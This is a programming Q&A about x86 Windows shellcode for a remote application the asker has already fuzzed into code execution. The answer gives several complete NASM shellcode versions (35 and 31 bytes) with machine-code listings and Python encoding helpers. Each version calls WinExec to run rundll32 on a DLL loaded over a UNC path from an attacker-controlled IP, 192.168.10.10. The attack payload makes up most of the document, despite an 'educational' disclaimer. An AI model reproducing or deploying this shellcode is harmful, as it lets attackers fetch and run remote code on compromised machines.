assembly x86 shellcode machine-code code-size

Re-use string at known address to save bytes and reduce size of shellcode payload

Edit: DISCLAIMER- This is for educational purposes only as I am trying to learn shellcoding in x86 asm -- this is not a request for assistance in writing an in-the-wild exploit in any way.

Basically, regardless of why I'm asking, what I want to learn is how to take a known piece of information stored in memory, such as:

00xxxxxx    ASCII "some information in ASCII"

And re-purpose the information stored at that address in my asm code. Would I perform a lea eax,[address]? I've tried a number of things and nothing results in the information stored in that address space appearing as expected.

--- original-ish post--- I am working on a POC shellcode x86 asm in Windows 32 bit. I've fuzzed a remote application, and am able to execute code - such as this: http://shell-storm.org/shellcode/files/shellcode-482.php

I noticed that the connecting address (attacking address) after the crash is always in the same hard coded address space showing in dump in the debugger as:

00aabbcc   ASCII "192.168.1.XX."

I want to use the shell-storm cmd.exe shellcode above, but somehow pass it the address containing my IP address in ASCII in order to download/run a rundll32.exe exploit. How would I go about referencing that address (it does contain a null first byte) and passing it along in x86 asm to cmd.exe?

This is just an example of what I used to get code execution. It also works with cmd.exe. On the 4th and 5th lines I am passing "calc.exe" as 8 bytes of plain text, hex-encoded if you will. I want to modify this to execute rundll32 instead of calc or cmd, where

rundll32.exe \\<HARD CODED ADDRESS REFERENCE HERE>\x.dll,0

where the above is simply where I insert the hard-coded IP that I've observed in memory.

# this is the asm code for launching calc.exe successfully:
#0:  89 e5                   mov    ebp,esp
#2:  55                      push   ebp              ; 4 bytes possibly with low byte = 0?
#3:  89 e5                   mov    ebp,esp
#5:  68 2e 65 78 65          push   0x6578652e       ; ".exe"
#a:  68 63 61 6c 63          push   0x636c6163       ; "calc"
#f:  8d 45 f8                lea    eax,[ebp-0x8]    ; pointer to the string = mov eax, esp
#12: 50                      push   eax
#13: b8 c7 93 c2 77          mov    eax,0x77c293c7    ; kernel32.WinExec
#18: ff d0                   call   eax

In the above example snippet, how would I, in lines 4-5, insert the ASCII value located at the previously mentioned memory address? That is the real meat of my question here regarding x86 asm. Would I use a memcpy? strcpy? I'm kind of a novice and definitely not a daily practitioner of asm.

Solution

After another look at the question, your actual question was about concatenating stuff with a runtime-variable C-string from a known address in the target system. Like sprintf(buf, '\\%s\x.dll', 0x00xxxxxx).

(It turns out it's actually a known constant length and value, and you were just trying to save payload size by copying it.) Update: see below for 35-byte versions that hard-code the whole string in the payload, and a 31-byte version that builds the \\...\x.dll string around the existing string instead of copying it.

Copying small amounts of data is hard. x86 instructions take code-size for the opcode and for the addressing modes (register or memory) of your data, except for instructions with implicit operands like stos, movsb, or push. And even those still use bytes for the opcode. Repeated single-byte elements are hard to take advantage of. At a large scale, if you have room to write a decompressor, you could include run-length encoding or even Huffman coding. But when your data isn't much bigger than a few instructions, it's all just little tricks like in the last part of this answer.

But maybe efficiently hard-coding it can be small enough, without reading the 13-byte IP address from a known address (which takes at least 7 bytes to generate in a register with mov eax, imm32 / not eax to avoid 0 bytes in the immediate)
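To sanity-check that 7-byte figure, here is a small Python sketch of the encoding. The helper name `mov_not_eax` is made up for illustration, and 0x00AABBCC is just the placeholder address from the question, not a real one.

```python
import struct

def mov_not_eax(address: int) -> bytes:
    """Encode `mov eax, ~address` / `not eax` (hypothetical helper)."""
    inverted = ~address & 0xFFFFFFFF               # bitwise NOT, truncated to 32 bits
    code = b"\xB8" + struct.pack("<I", inverted)   # B8 id = mov eax, imm32
    code += b"\xF7\xD0"                            # F7 D0 = not eax
    return code

code = mov_not_eax(0x00AABBCC)   # placeholder address from the question
print(code.hex(" "), "-", len(code), "bytes, zero-free:", 0 not in code)
```

Note that any 0xFF byte in the address would become 0x00 after inversion, so whether this trick avoids zero bytes depends on the actual address.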

Two ways to hard-code fixed strings in payloads

In 32-bit mode, repeated push imm32 will build up an arbitrary-length string on the stack (in reverse order, of course).

Start by pushing an xor-zeroed register to get a 0-terminated C string. Your literal string is pure text, so I don't see any reason to worry about zero bytes other than that. But if you did, pad with a filler character and overwrite it with a byte-store from your zero register.

If it's not naturally a multiple of 4 bytes, you can sometimes expand \ to \\ or \\\ or \.\ in paths. Or use push imm8 for the last character (which you push first), also pushing 3 bytes of zeros for free. (Assuming your character is 1..127 so sign-extension produces zeros instead of 0xFF). For this case specifically, WinExec splits on spaces so push ' ' can push a space + terminating 0 bytes.

And/or if 4-byte alignment of the stack isn't needed, use 4-byte push word imm16 for the last 2 bytes of data (operand-size prefix + opcode + 2 bytes of data = 4 bytes of code).

The payload-size overhead is 1 push opcode byte per 4 string bytes, plus the terminator, with the string size potentially padded up to a multiple of 4 bytes.
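The push scheme described above can be sketched in Python to count bytes before writing any asm. This is only a rough illustration: `push_string` is a hypothetical helper, and it deliberately handles just two cases (length 4k with a separate zeroed-register terminator, or length 4k+1 where push imm8 supplies the last character plus the zeros).

```python
def push_string(text: bytes) -> bytes:
    """Machine code that builds `text` as a 0-terminated string on the stack.

    Hypothetical helper: supports lengths of 4k or 4k+1 bytes only.
    """
    body = text
    if len(text) % 4 == 1 and 0 < text[-1] < 0x80:
        body = text[:-1]
        code = b"\x6A" + text[-1:]       # 6A ib = push imm8 (sign-extends to zeros)
    elif len(text) % 4 == 0:
        code = b"\x31\xC0\x50"           # xor eax,eax / push eax = terminator
    else:
        raise ValueError("pad the string to 4k or 4k+1 bytes first")
    # Push 4-byte chunks last-to-first so the string reads forward in memory.
    for i in range(len(body) - 4, -1, -4):
        code += b"\x68" + body[i:i + 4]  # 68 id = push imm32, bytes stored as-is
    return code

unc = rb"\\192.168.10.10\x.dll"          # 21 bytes = 4*5 + 1
print(len(push_string(unc)))             # 27
print(push_string(b"calc.exe").hex(" "))
```

For "calc.exe" the two push imm32 instructions come out as 68 2e 65 78 65 and 68 63 61 6c 63, the same bytes as in the disassembly from the question.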

The other main option is to include the string as literal data after the payload.

    ...
    jmp  push_string_address
back_from_call:
    ;; pop  eax      ; or just leave the string address on the stack

    ...

push_string_address:
    call  back_from_call     ; pushes the address of the end of the instruction and jumps
    db    "\\<HARD CODED ADDRESS REFERENCE HERE>\x.dll"    ;, 0
    ; terminating zero byte in the target system will be there from its strcpy

Total overhead: 2-byte jmp rel8 + 5-byte call rel32, + 1-byte pop reg if you do pop it instead of leaving it on the stack as an arg in the 32-bit calling convention.

The call has to be backwards so the high bytes of the rel32 are FF, not 00 for a positive displacement.
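A quick Python check of the displacement bytes makes the difference visible. `call_rel32` is a hypothetical helper, and the offsets 9 and 2 are simply the ones that show up in the NASM listing later in this answer.

```python
import struct

def call_rel32(call_offset: int, target_offset: int) -> bytes:
    """Encode `call rel32`; the displacement is relative to the next instruction."""
    rel = target_offset - (call_offset + 5)   # E8 + 4 displacement bytes = 5
    return b"\xE8" + struct.pack("<i", rel)

backward = call_rel32(9, 2)    # call placed after its target
forward = call_rel32(2, 9)     # call placed before its target
print(backward.hex(" "))       # e8 f4 ff ff ff
print(forward.hex(" "))        # e8 02 00 00 00
```

A small negative displacement sign-extends to FF bytes, while a small positive one leaves three zero bytes in the machine code.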

In 64-bit mode you can use RIP-relative addressing to easily avoid problematic bytes, even avoiding FF bytes if you want. But jmp / call is actually still more compact.

Comparison of both ways for your case:

I don't see where you're 0-terminating your string. In the "cmd.exe " example you started with, trailing garbage after the space would still run cmd.exe but with args, until there's a 0 byte on the stack anywhere.

Here any non-zero byte in the bottom of incoming EBP will come right after the .exe in your string.

But all the stuff with ebp is a waste of space. WinExec takes 2 args: a pointer and an integer. The integer is apparently don't-care if it's out of range for being a GUI window behaviour code, so it's fine if the first 4 bytes of the string are also the UINT uCmdShow argument. (Apparently the function doesn't use that arg as scratch space before reading the string, or at all.) There's no benefit at all to saving the pre-buffer-overflow value of EBP or setting up a "stack frame".

The string breaks up perfectly into 4-byte chunks + one 1-byte that lets us get the terminator cheaply:
\\19 | 2.16 | 8.10 | .10\ | x.dl | l

This is NASM source, where 'x.dl' is a 32-bit constant that produces bytes in memory in that order (unlike MASM). NASM only processes backslashes as C-style escapes inside backquoted strings; single and double quotes are equivalent.

;;; NASM syntax; byte counts are in the comments
             BITS 32
    push    'l'        ; 2 bytes  'l\0\0\0'
    push    'x.dl'     ; 5 bytes
    push    '.10\'     ; 5 bytes
    push    '8.10'     ; 5 bytes
    push    '2.16'     ; 5 bytes
    push    '\\19'     ; 5 bytes
; 27 bytes to construct the string

   ;; ESP points to the data we just pushed = 0-terminated string
    push    esp        ; 1 byte   pushes the old value: pointer to the string

    mov     eax,0x77c293c7    ; b8 c7 93 c2 77   kernel32.WinExec
    call    eax               ; ff d0

Total: 35 bytes either way, above (push) or below (jmp/call)

NASM listing from nasm -l/dev/stdout foo.asm (creating a flat binary of the shellcode, ready to hexdump into a C string).

     1                          bits 32
     2                          top:
     3 00000000 EB07                jmp  push_string_address
     4                          back_from_call:
     5                              ;; pop  edi      ; or just leave the string address on the stack
     6                                  
     7 00000002 B8C793C277          mov    eax,0x77c293c7    ; kernel32.WinExec
     8 00000007 FFD0                call   eax
     9                                  
    10                          push_string_address:
    11 00000009 E8F4FFFFFF          call  back_from_call     ; pushes the address of the end of the instruction and jumps
    12 0000000E 5C5C3139322E313638-       db    "\\192.168.10.10\x.dll"    ;, 0
    12 00000017 2E31302E31305C782E-
    12 00000020 646C6C             
    13                              ; terminating zero byte in the target system will be there from the strcpy we overflowed

(00000023 23 size: db $ - top is a line I included at the bottom to get NASM to calculate the size for me: 0x23 = 35 bytes)

The string itself takes 21 bytes, but the jmp + call take 7 bytes. Same as the opcode overhead from 6 push imm instructions plus push esp. So we're just at the break-even point where a longer string would be more efficient with jmp/call.
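The break-even arithmetic can be written out as a tiny Python sketch. Both function names are made up here, and the push formula assumes a string of 4k+1 bytes so the last character can go in a push imm8, as in this example.

```python
def push_total(n: int) -> int:
    """Bytes to build an n-byte string with pushes, for n = 4k + 1 (sketch)."""
    k = n // 4
    return 5 * k + 2 + 1          # k push imm32, one push imm8, then push esp

def jmp_call_total(n: int) -> int:
    """Bytes for jmp rel8 + call rel32 + the literal string data."""
    return 2 + 5 + n

# Columns: string length, push version, jmp/call version (before mov/call eax)
for n in (13, 17, 21, 25, 29):
    print(n, push_total(n), jmp_call_total(n))
```

At n = 21 both come to 28 bytes (35 with the 7-byte mov/call eax); for longer strings the push version grows by 5 bytes per 4 characters while jmp/call grows by 4.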

Alternate approach: build the string in place around the fixed part

If that memory containing the "192.168.10.10" is in a writeable page, we can write bytes before/after it to make the C-string we want.

;; build a string around the part we want, version 1 (35 bytes)
string_address equ  0x00abcdef
string_length equ   13              ; strlen("192.168.10.10")

    mov  edi,  -(string_address - 2)  ; 5B
    neg  edi                          ; 2B  EDI points 2 bytes before the existing string

    mov  word [edi], '\\'             ; 5B  store 2 bytes: prepend \\

    mov  dword [edi + string_length+2], '\x.d'    ; 7B
    push  'l'
    pop   eax                                  ; 'l\0\0\0'
    mov   ah,al                                ; 2B  copy low byte to 2nd byte
    mov  [edi + string_length+2 + 4], eax      ; 3B  append 'll\0\0'
 ;;; append '\x.dll\0\0'

    push edi
    mov    eax,0x77c293c7    ; kernel32.WinExec
    call   eax

Amusingly / frustratingly, this is also 0x23 = 35 bytes!!!

I feel like there should be a more efficient way to get the end of the string written. push/pop + mov to duplicate the low byte feels like a lot.

Or I could mutate one bit-pattern in EAX into another with a 5-byte sub or xor eax, imm32. (Special EAX-only encoding without a ModRM byte). That can produce the zeros without having any in the machine code.

I see another way that saves bytes by moving EDI, and exploiting the redundancy of \ appearing in multiple places, using stosb / stosd to append AL or EAX. It saves 4 bytes. (See a previous version of the answer for "version 2")

Best so far: 31 bytes. (NASM listing: machine code + source)

;; build a string around the part we want, version 3 (31 bytes)
;; Assumes DF=0 when it runs, which is guaranteed by the calling convention
;;    if we got here from a ret in compiler-generated code
     1                         bits 32
     2                         top:
     3                         str_address equ  0x00abcdef
     4                         str_length equ   13              ; strlen("192.168.10.10")
     5                         
     6 00000000 BF133254FF         mov  edi,  -(str_address - 2)     ; 5B
     7 00000005 F7DF               neg  edi                          ; 2B  EDI points 2 bytes before the existing string
     8 00000007 57                 push edi                          ; push function arg now, before modifying EDI
     9                         
    10 00000008 B85C782E64         mov  eax, '\x.d'                  ; low byte = backslash is reusable
    11 0000000D AA                 stosb                             ; 1B   *edi++ = AL   '\'
    12 0000000E AA                 stosb                             ; 1B   *edi++ = AL   '\'
    13                          ;;; we've now prepended \\
    14                          ;;; EDI is pointing at the start of the original string
    15                         
    16 0000000F 83C70D             add   edi, str_length             ; point EDI past the end, where we want to write more
    17 00000012 AB                 stosd                             ; 1B   *edi = eax; edi+=4;  append '\x.d'
    18 00000013 6A6C               push  'l'
    19 00000015 58                 pop   eax                           ; 'l\0\0\0' in a reg, constructed in 3 bytes
    20 00000016 AA                 stosb                             ; append 'l'
    21 00000017 AB                 stosd                             ; append 'l\0\0\0'
    22                          ;;; append '\x.dll\0\0\0'
    23                           
    24 00000018 B8C793C277         mov    eax,0x77c293c7    ; kernel32.WinExec
    25 0000001D FFD0               call   eax

31 bytes
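Since none of this was run on a real target, one way to gain some confidence in the store sequence is to replay it on a toy buffer in Python. This is only a model under stated assumptions: the `stos` helper and the `mem` layout are invented for illustration, 0xCC stands in for whatever unknown bytes surround the string, and 0x00ABCDEF is the placeholder address from the listing.

```python
STR_ADDRESS = 0x00ABCDEF            # placeholder address from the listing
IP = b"192.168.10.10"

# Toy memory window starting 2 bytes before the string; 0xCC marks bytes
# that would hold unknown data on a real target.
base = STR_ADDRESS - 2
mem = bytearray(b"\xCC" * 2 + IP + b"\xCC" * 16)

def stos(edi: int, value: int, size: int) -> int:
    """Store the low `size` bytes of `value` at EDI, then advance EDI (DF=0)."""
    off = edi - base
    mem[off:off + size] = (value & (256 ** size - 1)).to_bytes(size, "little")
    return edi + size

imm = -(STR_ADDRESS - 2) & 0xFFFFFFFF        # immediate of mov edi
edi = -imm & 0xFFFFFFFF                      # neg edi
arg = edi                                    # push edi
eax = int.from_bytes(rb"\x.d", "little")     # mov eax, '\x.d'
edi = stos(edi, eax, 1)                      # stosb
edi = stos(edi, eax, 1)                      # stosb
edi += len(IP)                               # add edi, str_length
edi = stos(edi, eax, 4)                      # stosd
eax = ord("l")                               # push 'l' / pop eax
edi = stos(edi, eax, 1)                      # stosb
edi = stos(edi, eax, 4)                      # stosd

start = arg - base
c_string = bytes(mem[start:mem.index(0, start)])
print(imm.to_bytes(4, "little").hex(), c_string.decode())
```

In this model the pointer pushed as the argument ends up pointing at a 0-terminated `\\192.168.10.10\x.dll`, and the mov edi immediate contains no zero bytes. It says nothing about whether the page is writeable or what the extra stores clobber on a real system.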

(NASM listing generated with nasm foo.asm -l/dev/stdout | cut -b -30,$((30+10))-. You can strip the listing columns (the first 31 bytes of each line) to recover the original source with <foo.lst cut -b 32- > foo.asm, so you can assemble it yourself.)

All of these are untested. Size counts are correct (mostly from NASM calculating it), except the push version.

There may of course be room for more savings I missed.

Or there could be bugs that require extra bytes to fix, or different golfing.

Further ideas: The top byte of EDI is known to be zero. Maybe a 4-byte store of that at some point could get a zero in place then overwrite the bytes before?

I wonder if call far ptr16:32 with a hardcoded segment descriptor (assuming we know what Windows uses as the user-space value of cs) would be smaller than mov/call eax? No: opcode + 4byte absolute addr + 2byte segment = 7 bytes, same as 5-byte mov + 2-byte call eax to reach an absolute address from an unknown EIP (so we can't use 5-byte call rel32).

For more code-size optimization ideas in general, see https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code